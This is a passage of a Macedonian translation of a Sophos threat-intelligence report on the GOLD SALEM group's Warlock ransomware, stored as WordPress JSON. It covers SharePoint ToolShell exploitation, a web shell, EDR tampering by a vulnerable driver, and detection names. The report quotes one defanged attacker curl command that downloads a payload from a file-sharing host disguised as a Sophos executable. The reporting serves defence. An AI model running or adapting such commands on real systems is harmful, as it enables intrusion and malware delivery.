\u0434\u0430 \u0441\u0435 \u043f\u043b\u0430\u0442\u0430\u0442 \u043e\u0442\u043a\u0443\u043f\u0438 \u0437\u0430 \u0434\u0430 \u0441\u0435 \u0438\u0437\u0431\u0435\u0433\u043d\u0435 \u043e\u0431\u0458\u0430\u0432\u0443\u0432\u0430\u045a\u0435 \u043d\u0430 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u0438\u0442\u0435 \u043f\u043e\u0434\u0430\u0442\u043e\u0446\u0438.\" width=\"640\" height=\"333\" \/><\/a><\/p>\n<p style=\"text-align: justify;\"><em><span dir=\"auto\">\u0421\u043b\u0438\u043a\u0430: \u0414\u0430\u0442\u0443\u043c\u0438\u0442\u0435 \u0437\u0430 \u043e\u0434\u0431\u0440\u043e\u0458\u0443\u0432\u0430\u045a\u0435 \u043d\u0430\u0432\u0435\u0434\u0435\u043d\u0438 \u043d\u0430 DLS \u043d\u0430 GOLD SALEM \u043e\u0434 16 \u0441\u0435\u043f\u0442\u0435\u043c\u0432\u0440\u0438 2025 \u0433\u043e\u0434\u0438\u043d\u0430<\/span><\/em><\/p>\n<h6 style=\"text-align: justify;\"><span dir=\"auto\">\u041d\u0430\u0431\u0459\u0443\u0434\u0443\u0432\u0430\u043d\u0438 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0438<\/span><\/h6>\n<p style=\"text-align: justify;\"><span dir=\"auto\">\u041a\u043e\u043d \u043a\u0440\u0430\u0458\u043e\u0442 \u043d\u0430 \u0458\u0443\u043b\u0438, \u0438\u0441\u0442\u0440\u0430\u0436\u0443\u0432\u0430\u0447\u0438\u0442\u0435 \u043d\u0430 CTU \u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0430\u0430 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442 \u0432\u043e \u043a\u043e\u0458 GOLD SALEM \u0433\u043e \u043a\u043e\u0440\u0438\u0441\u0442\u0435\u0448\u0435\u00a0<\/span><a href=\"https:\/\/www.cisa.gov\/news-events\/alerts\/2025\/07\/20\/update-microsoft-releases-guidance-exploitation-sharepoint-vulnerabilities\"><span dir=\"auto\">\u0441\u0438\u043d\u045f\u0438\u0440\u043e\u0442 \u043d\u0430 \u0435\u043a\u0441\u043f\u043b\u043e\u0430\u0442\u0430\u0446\u0438\u0458\u0430 \u043d\u0430 ToolShell<\/span><\/a><span dir=\"auto\">\u00a0\u043f\u0440\u043e\u0442\u0438\u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u0438\u0442\u0435 \u043d\u0430 SharePoint \u0437\u0430 \u043f\u043e\u0447\u0435\u0442\u0435\u043d \u043f\u0440\u0438\u0441\u0442\u0430\u043f. \u041e\u0432\u043e\u0458 \u0441\u0438\u043d\u045f\u0438\u0440 \u043d\u0430 \u0435\u043a\u0441\u043f\u043b\u043e\u0430\u0442\u0430\u0446\u0438\u0458\u0430 \u0441\u0435 \u043f\u043e\u0442\u043f\u0438\u0440\u0430 \u043d\u0430 \u043a\u043e\u0440\u0438\u0441\u0442\u0435\u045a\u0435 \u043d\u0430 \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0458\u0430 \u043e\u0434 \u0440\u0430\u043d\u043b\u0438\u0432\u043e\u0441\u0442\u0438\u00a0<\/span><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-49704\"><span dir=\"auto\">CVE-2025-49704<\/span><\/a><span dir=\"auto\">\u00a0,\u00a0<\/span><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-49706\"><span dir=\"auto\">CVE-2025-49706<\/span><\/a><span dir=\"auto\">\u00a0,\u00a0<\/span><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-53770\"><span dir=\"auto\">CVE-2025-53770<\/span><\/a><span dir=\"auto\">\u00a0\u0438\u00a0<\/span><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-53771\"><span dir=\"auto\">CVE-2025-53771<\/span><\/a><span dir=\"auto\">\u00a0. \u0415\u043a\u0441\u043f\u043b\u043e\u0430\u0442\u0430\u0446\u0438\u0458\u0430\u0442\u0430 \u0440\u0435\u0437\u0443\u043b\u0442\u0438\u0440\u0430\u0448\u0435 \u0441\u043e \u043f\u043e\u0441\u0442\u0430\u0432\u0443\u0432\u0430\u045a\u0435 \u043d\u0430 ASPX \u0432\u0435\u0431-\u0448\u043a\u043e\u043b\u043a\u0430 \u0448\u0442\u043e \u0441\u043e\u0437\u0434\u0430\u0434\u0435 \u043e\u0431\u0458\u0435\u043a\u0442\u00a0<\/span><a href=\"https:\/\/learn.microsoft.com\/en-us\/dotnet\/api\/system.diagnostics.process?view=net-9.0\"><span dir=\"auto\">Process<\/span><\/a><span dir=\"auto\">\u00a0\u0437\u0430 cmd.exe \u0432\u043e \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442 \u043d\u0430 \u0440\u0430\u0431\u043e\u0442\u043d\u0438\u043e\u0442 \u043f\u0440\u043e\u0446\u0435\u0441 \u043d\u0430 IIS (w3wp.exe). \u041d\u0430\u043f\u0430\u0453\u0430\u0447\u043e\u0442 \u043f\u043e\u0442\u043e\u0430 \u043c\u043e\u0436\u0435\u0448\u0435 \u0434\u0430\u043b\u0435\u0447\u0438\u043d\u0441\u043a\u0438 \u0434\u0430 \u0438\u0437\u0432\u0440\u0448\u0443\u0432\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u043d\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0438 \u0438 \u0434\u0430 \u043c\u0443 \u0441\u0435 \u043f\u0440\u0438\u043a\u0430\u0436\u0435 \u0441\u0435\u043a\u043e\u0458 \u0434\u043e\u0431\u0438\u0435\u043d \u0438\u0437\u043b\u0435\u0437. \u0418\u0441\u0442\u0440\u0430\u0436\u0443\u0432\u0430\u0447\u0438\u0442\u0435 \u043d\u0430 CTU \u0458\u0430 \u0437\u0430\u0431\u0435\u043b\u0435\u0436\u0430\u0430 \u0441\u043b\u0435\u0434\u043d\u0430\u0442\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0438\u0437\u0434\u0430\u0434\u0435\u043d\u0430 \u043f\u0440\u0435\u043a\u0443 \u043e\u0432\u0430\u0430 \u0432\u0435\u0431-\u0448\u043a\u043e\u043b\u043a\u0430:<\/span><\/p>\n<pre><span dir=\"auto\">curl -L -oc:\\\\users\\\\public\\\\Sophos\\\\Sophos-UI.exe hxxps[:]\/\/filebin[.]net\/j7jqfnh8tn4alzsr\/wsocks.exe.txt<\/span><\/pre>\n<p style=\"text-align: justify;\"><span dir=\"auto\">\u041f\u0440\u0435\u0437\u0435\u043c\u0435\u043d\u0430\u0442\u0430 \u0438\u0437\u0432\u0440\u0448\u043d\u0430 \u0434\u0430\u0442\u043e\u0442\u0435\u043a\u0430 \u0431\u0435\u0448\u0435 \u0441\u0435\u0440\u0432\u0435\u0440 WebSockets \u0431\u0430\u0437\u0438\u0440\u0430\u043d \u043d\u0430 Golang \u043a\u043e\u0458 \u0434\u043e\u0437\u0432\u043e\u043b\u0443\u0432\u0430\u0448\u0435 \u043a\u043e\u043d\u0442\u0438\u043d\u0443\u0438\u0440\u0430\u043d \u043f\u0440\u0438\u0441\u0442\u0430\u043f \u0434\u043e \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430\u043d\u0438\u043e\u0442 \u0441\u0435\u0440\u0432\u0435\u0440 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u043d\u043e \u043e\u0434 \u0432\u0435\u0431-\u0448\u0435\u043b\u043e\u0442. \u0418\u0441\u0442\u0440\u0430\u0436\u0443\u0432\u0430\u0447\u0438\u0442\u0435 \u043d\u0430 CTU, \u0438\u0441\u0442\u043e \u0442\u0430\u043a\u0430, \u0437\u0430\u0431\u0435\u043b\u0435\u0436\u0430\u0430 \u0434\u0435\u043a\u0430 GOLD SALEM \u0433\u043e \u0437\u0430\u043e\u0431\u0438\u043a\u043e\u043b\u0443\u0432\u0430 EDR \u043a\u043e\u0440\u0438\u0441\u0442\u0435\u0458\u045c\u0438 \u0458\u0430 \u0442\u0435\u0445\u043d\u0438\u043a\u0430\u0442\u0430 Bring Your Own Vulnerable Driver (BYOVD) \u0438 \u0440\u0430\u043d\u043b\u0438\u0432 \u0434\u0440\u0430\u0458\u0432\u0435\u0440 \u043d\u0430 Baidu Antivirus \u043f\u0440\u0435\u0438\u043c\u0435\u043d\u0443\u0432\u0430\u043d \u0432\u043e googleApiUtil64.sys \u0437\u0430 \u0434\u0430 \u0433\u043e \u043f\u0440\u0435\u043a\u0438\u043d\u0435 EDR \u0430\u0433\u0435\u043d\u0442\u043e\u0442. \u041c\u0430\u0430\u043d\u0430 \u0432\u043e \u043e\u0432\u043e\u0458 \u0434\u0440\u0430\u0458\u0432\u0435\u0440 (\u00a0<\/span><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-51324\"><span dir=\"auto\">CVE-2024-51324<\/span><\/a><span dir=\"auto\">\u00a0) \u043e\u0432\u043e\u0437\u043c\u043e\u0436\u0443\u0432\u0430 \u043f\u0440\u0435\u043a\u0438\u043d\u0443\u0432\u0430\u045a\u0435 \u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u043d\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0438.<\/span><\/p>\n<p style=\"text-align: justify;\"><span dir=\"auto\">\u0412\u043e \u043f\u0440\u043e\u0444\u0438\u043b\u043e\u0442 \u043d\u0430 \u201eMicrosoft\u201c \u0437\u0430 \u0433\u0440\u0443\u043f\u0430\u0442\u0430 \u0435 \u0437\u0430\u0431\u0435\u043b\u0435\u0436\u0430\u043d\u043e \u0438\u0437\u0432\u0440\u0448\u0443\u0432\u0430\u045a\u0435\u0442\u043e \u043d\u0430 Mimikatz \u201e\u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u043d\u043e \u043d\u0430\u0441\u043e\u0447\u0435\u043d\u043e \u043a\u043e\u043d \u043c\u0435\u043c\u043e\u0440\u0438\u0458\u0430\u0442\u0430 \u043d\u0430 Local Security Authority Subsystem Service (LSASS) \u0437\u0430 \u0438\u0437\u0432\u043b\u0435\u043a\u0443\u0432\u0430\u045a\u0435 \u043d\u0430 \u0430\u043a\u0440\u0435\u0434\u0438\u0442\u0438\u0432\u0438 \u0441\u043e \u0447\u0438\u0441\u0442 \u0442\u0435\u043a\u0441\u0442\u201c. \u201eMicrosoft\u201c \u0438\u0441\u0442\u043e \u0442\u0430\u043a\u0430 \u0458\u0430 \u0437\u0430\u0431\u0435\u043b\u0435\u0436\u0430 \u0443\u043f\u043e\u0442\u0440\u0435\u0431\u0430\u0442\u0430 \u043d\u0430 PsExec \u0438 Impacket \u0437\u0430 \u043b\u0430\u0442\u0435\u0440\u0430\u043b\u043d\u043e \u0434\u0432\u0438\u0436\u0435\u045a\u0435 \u0438 \u0443\u043f\u043e\u0442\u0440\u0435\u0431\u0430\u0442\u0430 \u043d\u0430 Group Policy Objects (GPO) \u0437\u0430 \u0440\u0430\u0441\u043f\u043e\u0440\u0435\u0434\u0443\u0432\u0430\u045a\u0435 \u043d\u0430 Warlock payload.<\/span><\/p>\n<p style=\"text-align: justify;\"><span dir=\"auto\">\u0412\u043e \u0430\u0432\u0433\u0443\u0441\u0442, \u0438\u0441\u0442\u0440\u0430\u0436\u0443\u0432\u0430\u0447\u0438\u0442\u0435 \u043d\u0430 CTU \u0437\u0430\u0431\u0435\u043b\u0435\u0436\u0430\u0430 \u0434\u0435\u043a\u0430 GOLD SALEM \u0458\u0430 \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u0443\u0432\u0430 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u0430\u0442\u0430 \u0430\u043b\u0430\u0442\u043a\u0430 \u0441\u043e \u043e\u0442\u0432\u043e\u0440\u0435\u043d \u043a\u043e\u0434\u00a0<\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2025\/08\/26\/velociraptor-incident-response-tool-abused-for-remote-access\/\"><span dir=\"auto\">Velociraptor<\/span><\/a><span dir=\"auto\">\u00a0\u0437\u0430 \u0434\u0438\u0433\u0438\u0442\u0430\u043b\u043d\u0430 \u0444\u043e\u0440\u0435\u043d\u0437\u0438\u043a\u0430 \u0438 \u043e\u0434\u0433\u043e\u0432\u043e\u0440 \u043d\u0430 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0438 (DFIR) \u0437\u0430 \u0434\u0430 \u0432\u043e\u0441\u043f\u043e\u0441\u0442\u0430\u0432\u0438 \u043c\u0440\u0435\u0436\u0435\u043d \u0442\u0443\u043d\u0435\u043b \u043d\u0430 Visual Studio Code \u0432\u043e \u0440\u0430\u043c\u043a\u0438\u0442\u0435 \u043d\u0430 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430\u043d\u0430\u0442\u0430 \u0441\u0440\u0435\u0434\u0438\u043d\u0430. \u041d\u0435\u043a\u043e\u0438 \u043e\u0434 \u043e\u0432\u0438\u0435 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0438 \u0437\u0430\u0432\u0440\u0448\u0438\u0458\u0430 \u0441\u043e \u0440\u0430\u0441\u043f\u043e\u0440\u0435\u0434\u0443\u0432\u0430\u045a\u0435 \u043d\u0430 Warlock ransomware.<\/span><\/p>\n<h6 style=\"text-align: justify;\"><span dir=\"auto\">\u0423\u0431\u043b\u0430\u0436\u0443\u0432\u0430\u045a\u0435 \u0438 \u0434\u0435\u0442\u0435\u043a\u0446\u0438\u0438<\/span><\/h6>\n<p style=\"text-align: justify;\"><span dir=\"auto\">\u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438\u0442\u0435 \u0442\u0440\u0435\u0431\u0430 \u0434\u0430 \u0441\u043f\u0440\u043e\u0432\u0435\u0434\u0443\u0432\u0430\u0430\u0442 \u0440\u0435\u0434\u043e\u0432\u043d\u043e \u0441\u043b\u0435\u0434\u0435\u045a\u0435 \u043d\u0430 \u043f\u043e\u0432\u0440\u0448\u0438\u043d\u0430\u0442\u0430 \u043d\u0430 \u043d\u0430\u043f\u0430\u0434\u0438\u0442\u0435 \u0438 \u0434\u0430 \u0438\u043c\u0430\u0430\u0442 \u0430\u0433\u0440\u0435\u0441\u0438\u0432\u043d\u0438 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438 \u0437\u0430 \u0437\u0430\u043a\u0440\u043f\u0443\u0432\u0430\u045a\u0435 \u0437\u0430 \u0443\u0441\u043b\u0443\u0433\u0438\u0442\u0435 \u0448\u0442\u043e \u0441\u0435 \u043f\u043e\u0432\u0440\u0437\u0430\u043d\u0438 \u0441\u043e \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442. \u0414\u0435\u0442\u0435\u043a\u0446\u0438\u0458\u0430\u0442\u0430 \u0438 \u0443\u0431\u043b\u0430\u0436\u0443\u0432\u0430\u045a\u0435\u0442\u043e \u043d\u0430 \u0435\u043a\u0441\u043f\u043b\u043e\u0430\u0442\u0430\u0446\u0438\u0458\u0430\u0442\u0430 \u043e\u0434 \u043d\u0443\u043b\u0442\u0438 \u0434\u0435\u043d \u0431\u0430\u0440\u0430\u0430\u0442 \u043f\u0440\u043e\u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0441\u043b\u0435\u0434\u0435\u045a\u0435 \u043d\u0430 \u043a\u0440\u0430\u0458\u043d\u0438\u0442\u0435 \u0442\u043e\u0447\u043a\u0438 \u0438 \u043d\u0430\u0432\u0440\u0435\u043c\u0435\u043d \u043e\u0434\u0433\u043e\u0432\u043e\u0440 \u043d\u0430 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0438.<\/span><\/p>\n<p style=\"text-align: justify;\"><span dir=\"auto\">\u0421\u043b\u0435\u0434\u043d\u0438\u0442\u0435 Sophos \u0437\u0430\u0448\u0442\u0438\u0442\u0438 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u0430\u0430\u0442 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442 \u043f\u043e\u0432\u0440\u0437\u0430\u043d\u0430 \u0441\u043e \u043e\u0432\u0430\u0430 \u0437\u0430\u043a\u0430\u043d\u0430:<\/span><\/p>\n<ul style=\"text-align: justify;\">\n<li>Troj\/WebShel-F<\/li>\n<li>Troj\/Warlock-B<\/li>\n<\/ul>\n<div class=\"sharedaddy sd-sharing-enabled\" style=\"text-align: justify;\">\n<div class=\"robots-nocontent sd-block sd-social sd-social-icon-text sd-sharing\">\n<div class=\"sd-content\">\n<div class=\"sharing-hidden\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"mt-12\" style=\"text-align: justify;\">\n<ul id=\"social-sharing\" class=\"flex justify-center items-center space-x-6\">\n<li class=\"facebook\"><a class=\"js-share-modal\" title=\"\u0421\u043f\u043e\u0434\u0435\u043b\u0438 \u043d\u0430 \u0424\u0435\u0458\u0441\u0431\u0443\u043a\" href=\"http:\/\/www.facebook.com\/share.php?u=https:\/\/news.sophos.com\/?p=962800&amp;title=GOLD%20SALEM%E2%80%99s%20Warlock%20operation%20joins%20busy%20ransomware%20landscape\" data-title=\"GOLD SALEM\u2019s Warlock operation joins busy ransomware landscape\"><span class=\"sr-only\"><span dir=\"auto\">\u0421\u043f\u043e\u0434\u0435\u043b\u0438 \u043d\u0430 \u0424\u0435\u0458\u0441\u0431\u0443\u043a<\/span><\/span><\/a><\/li>\n<li class=\"twitter\"><a class=\"js-share-modal\" title=\"\u0421\u043f\u043e\u0434\u0435\u043b\u0438 \u043d\u0430 X\" href=\"http:\/\/twitter.com\/intent\/tweet?text=GOLD%20SALEM%E2%80%99s%20Warlock%20operation%20joins%20busy%20ransomware%20landscape%20https%3A%2F%2Fnews.sophos.com%2F%3Fp%3D962800\" data-title=\"\"><span class=\"sr-only\"><span dir=\"auto\">\u0421\u043f\u043e\u0434\u0435\u043b\u0438 \u043d\u0430 X<\/span><\/span><\/a><\/li>\n<li class=\"linkedin\"><a title=\"\u0421\u043f\u043e\u0434\u0435\u043b\u0438 \u043d\u0430 LinkedIn\" href=\"http:\/\/www.linkedin.com\/shareArticle?mini=true&amp;url=https:\/\/news.sophos.com\/en-us\/2025\/09\/17\/gold-salems-warlock-operation-joins-busy-ransomware-landscape\/\" data-title=\"GOLD SALEM\u2019s Warlock operation joins busy ransomware landscape\"><span class=\"sr-only\"><span dir=\"auto\">\u0421\u043f\u043e\u0434\u0435\u043b\u0438 \u043d\u0430 LinkedIn<\/span><\/span><\/a><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/article>\n<div class=\"container my-8 md:my-16\">\n<div class=\"max-w-4xl mx-auto\">\n<div class=\"article-author-block article-co-authors-block\">\n<div class=\"author-block\">\n<div class=\"author-block__profile\" style=\"text-align: justify;\"><\/div>\n<div class=\"author-block__wrapper\">\n<div class=\"author-block__content\">\n<div class=\"author-block__about\" style=\"text-align: justify;\"><span dir=\"auto\">\u0417\u0430 \u0430\u0432\u0442\u043e\u0440\u043e\u0442<\/span><\/div>\n<h6 class=\"author-block__name\" style=\"text-align: justify;\"><a class=\"author url fn\" title=\"\u041e\u0431\u0458\u0430\u0432\u0438 \u043e\u0434 \u0438\u0441\u0442\u0440\u0430\u0436\u0443\u0432\u0430\u0447\u043a\u0438\u043e\u0442 \u0442\u0438\u043c \u043d\u0430 \u041e\u0434\u0434\u0435\u043b\u043e\u0442 \u0437\u0430 \u0431\u043e\u0440\u0431\u0430 \u043f\u0440\u043e\u0442\u0438\u0432 \u0437\u0430\u043a\u0430\u043d\u0438 \u043d\u0430 Sophos\" href=\"https:\/\/news.sophos.com\/en-us\/author\/sophos-counter-threat-unit-research-team\/\" rel=\"author\"><span dir=\"auto\">\u0418\u0441\u0442\u0440\u0430\u0436\u0443\u0432\u0430\u0447\u043a\u0438 \u0442\u0438\u043c \u043d\u0430 \u041e\u0434\u0434\u0435\u043b\u043e\u0442 \u0437\u0430 \u0431\u043e\u0440\u0431\u0430 \u043f\u0440\u043e\u0442\u0438\u0432 \u0437\u0430\u043a\u0430\u043d\u0438 \u043d\u0430 Sophos<\/span><\/a><\/h6>\n<div class=\"author-block__bio\">\n<p style=\"text-align: justify;\"><span dir=\"auto\">\u0418\u0441\u0442\u0440\u0430\u0436\u0443\u0432\u0430\u0447\u0438\u0442\u0435 \u043d\u0430 Sophos Counter Threat Unit\u2122 (CTU) \u0441\u0435 \u043f\u0440\u0438\u0437\u043d\u0430\u0442\u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0442\u0435\u0442\u0438 \u0432\u043e \u043e\u0431\u043b\u0430\u0441\u0442\u0430 \u043d\u0430 \u0441\u0430\u0458\u0431\u0435\u0440 \u0431\u0435\u0437\u0431\u0435\u0434\u043d\u043e\u0441\u0442\u0430, \u0440\u0435\u0434\u043e\u0432\u043d\u043e \u043f\u0440\u0438\u0434\u043e\u043d\u0435\u0441\u0443\u0432\u0430\u0430\u0442 \u0441\u043e \u0435\u043a\u0441\u043f\u0435\u0440\u0442\u0441\u043a\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0438 \u0437\u0430 \u0433\u043b\u043e\u0431\u0430\u043b\u043d\u0438\u0442\u0435 \u043c\u0435\u0434\u0438\u0443\u043c\u0438, \u043e\u0431\u0458\u0430\u0432\u0443\u0432\u0430\u0430\u0442 \u0442\u0435\u0445\u043d\u0438\u0447\u043a\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0438 \u0437\u0430 \u0431\u0435\u0437\u0431\u0435\u0434\u043d\u043e\u0441\u043d\u0430\u0442\u0430 \u0437\u0430\u0435\u0434\u043d\u0438\u0446\u0430 \u0438 \u043f\u0440\u0435\u0437\u0435\u043d\u0442\u0438\u0440\u0430\u0430\u0442 \u0437\u0430 \u043d\u043e\u0432\u0438\u0442\u0435 \u0437\u0430\u043a\u0430\u043d\u0438 \u043d\u0430 \u0432\u043e\u0434\u0435\u0447\u043a\u0438\u0442\u0435 \u0431\u0435\u0437\u0431\u0435\u0434\u043d\u043e\u0441\u043d\u0438 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438. \u041f\u043e\u0434\u0434\u0440\u0436\u0430\u043d \u043e\u0434 \u043d\u0430\u043f\u0440\u0435\u0434\u043d\u0438\u0442\u0435 \u0431\u0435\u0437\u0431\u0435\u0434\u043d\u043e\u0441\u043d\u0438 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0438 \u043d\u0430 Sophos \u0438 \u0448\u0438\u0440\u043e\u043a\u0430 \u043c\u0440\u0435\u0436\u0430 \u043d\u0430 \u0440\u0430\u0437\u0443\u0437\u043d\u0430\u0432\u0430\u0447\u043a\u0438 \u043a\u043e\u043d\u0442\u0430\u043a\u0442\u0438 \u0438 \u043f\u0430\u0440\u0442\u043d\u0435\u0440\u0438, CTU\u2122 \u0438\u0433\u0440\u0430 \u043a\u043b\u0443\u0447\u043d\u0430 \u0443\u043b\u043e\u0433\u0430 \u0432\u043e \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0443\u0432\u0430\u045a\u0435\u0442\u043e \u0438 \u0441\u043b\u0435\u0434\u0435\u045a\u0435\u0442\u043e \u043d\u0430 \u0437\u0430\u043a\u0430\u043d\u0438\u0442\u0435 \u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0430\u0442\u0430 \u043d\u0430 \u0430\u043d\u043e\u043c\u0430\u043b\u043d\u0438\u0442\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438, \u043e\u0442\u043a\u0440\u0438\u0432\u0430\u045a\u0435\u0442\u043e \u043d\u043e\u0432\u0438 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u043d\u0430 \u043d\u0430\u043f\u0430\u0434, \u0437\u0430\u043a\u0430\u043d\u0438 \u0438 \u0433\u043e\u043b\u0435\u043c\u0438 \u043f\u0440\u043e\u043c\u0435\u043d\u0438 \u0432\u043e \u043f\u0435\u0458\u0437\u0430\u0436\u043e\u0442 \u043d\u0430 \u0437\u0430\u043a\u0430\u043d\u0438.<\/span><\/p>\n<\/div>\n<p>\u0420\u0435\u0448\u0435\u043d\u0438\u0458\u0430\u0442\u0430 \u043d\u0430 Sophos \u0441\u0435 \u0434\u043e\u0441\u0442\u0430\u043f\u043d\u0438 \u0432\u043e <a href=\"http:\/\/www.kabtel.mk\">\u041a\u0410\u0411\u0422\u0415\u041b<\/a>, <a href=\"https:\/\/kabtel.mk\/en\/kabtel-povtorno-sophos-platinum-partner\/\">Sophos Platinum Partner<\/a>.\u00a0 \u0414\u043e\u0437\u043d\u0430\u0458\u0442\u0435 \u043f\u043e\u0432\u0435\u045c\u0435 \u0437\u0430 <a href=\"https:\/\/kabtel.mk\/en\/komplet-alatki-protiv-ransomware\/\">ransomware<\/a> \u0438 <a href=\"https:\/\/kabtel.mk\/news-and-blog\/\">\u043e\u0441\u0442\u0430\u043d\u0430\u0442\u0438\u0442\u0435 \u0437\u0430\u043a\u0430\u043d\u0438<\/a>, \u043d\u043e \u0438 <a href=\"https:\/\/kabtel.mk\/contact\/\">\u043a\u043e\u043d\u0442\u0430\u043a\u0442\u0438\u0440\u0430\u0458\u0442\u0435 \u043d\u0450<\/a> \u0437\u0430 \u043f\u0435\u0440\u043f\u043e\u0440\u0430\u043a\u0438 \u043a\u0430\u043a\u043e \u0434\u0430 \u0433\u043e \u0437\u0430\u0448\u0442\u0438\u0442\u0438\u0442\u0435 \u0432\u0430\u0448\u0438\u043e\u0442 \u0431\u0438\u0437\u043d\u0438\u0441.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>\u041e\u043f\u0435\u0440\u0430\u0446\u0438\u0458\u0430\u0442\u0430 Warlock \u043d\u0430 \u0433\u0440\u0443\u043f\u0430\u0446\u0438\u0458\u0430\u0442\u0430 GOLD SALEM \u0441\u0435 \u043f\u0440\u0438\u043a\u043b\u0443\u0447\u0443\u0432\u0430 \u043d\u0430 \u043f\u0440\u0435\u043d\u0430\u0442\u0440\u0443\u043f\u0430\u043d\u0438\u043e\u0442 \u043f\u0435\u0458\u0437\u0430\u0436 \u0441\u043e ransomware \u041d\u043e\u0432\u0430\u0442\u0430 \u0433\u0440\u0443\u043f\u0430 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0430 \u043a\u043e\u043c\u043f\u0435\u0442\u0435\u043d\u0442\u043d\u0438 \u0432\u0435\u0448\u0442\u0438\u043d\u0438 \u043a\u043e\u0440\u0438\u0441\u0442\u0435\u0458\u045c\u0438 \u043f\u043e\u0437\u043d\u0430\u0442 \u043f\u0440\u0438\u0440\u0430\u0447\u043d\u0438\u043a \u0437\u0430 \u0440\u0430\u043d\u0441\u043e\u043c\u0432\u0435\u0440 \u0438 \u043d\u0430\u0432\u0435\u0441\u0442\u0443\u0432\u0430\u045a\u0430 \u0437\u0430 \u0433\u0435\u043d\u0438\u0458\u0430\u043b\u043d\u043e\u0441\u0442. \u0418\u0441\u0442\u0440\u0430\u0436\u0443\u0432\u0430\u0447\u0438\u0442\u0435 \u043d\u0430 Counter Threat Unit\u2122 (CTU) \u0441\u043b\u0435\u0434\u0430\u0442 \u0433\u0440\u0443\u043f\u0430 \u0437\u0430\u043a\u0430\u043d\u0438 \u043a\u043e\u0458\u0430 \u0441\u0435\u0431\u0435\u0441\u0438 \u0441\u0435 \u043d\u0430\u0440\u0435\u043a\u0443\u0432\u0430 Warlock Group. \u0413\u0440\u0443\u043f\u0430\u0442\u0430, \u043a\u043e\u0458\u0430 \u0438\u0441\u0442\u0440\u0430\u0436\u0443\u0432\u0430\u0447\u0438\u0442\u0435 \u043d\u0430 CTU\u2122 \u0458\u0430 \u0441\u043b\u0435\u0434\u0430\u0442 \u043a\u0430\u043a\u043e GOLD SALEM\u00a0, \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430\u043b\u0430 \u043c\u0440\u0435\u0436\u0438 \u0438 [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":11915,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[272,273,253,1092,568,560,567],"tags":[1058,688,569,705,606,1682,1062,1681,1063,627,1680,1683,276,661,1640,584,677,639,1684,1679,675,638,542,768,827,544,724,723,637],"class_list":["post-11914","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity-mk","category-news-events-mk","category-newsblog","category-recommendations-2","category-568","category-560","category-567","tag-1058","tag-antivirus-2","tag-bekap","tag-bezbednost","tag-cloud-2","tag-ctu","tag-cybersecurity-3","tag-dls","tag-edr-3","tag-endpoint-2","tag-gold-salem","tag-iab","tag-kabtel-mk","tag-kiber","tag-microsoft","tag-ransomware-2","tag-softver","tag-sophos-2","tag-storm-2603","tag-warlock","tag-675","tag-638","tag-542","tag-768","tag-827","tag----2","tag-724","tag-723","tag-637"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430 - KABTEL<\/title>\n<meta name=\"description\" content=\"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD 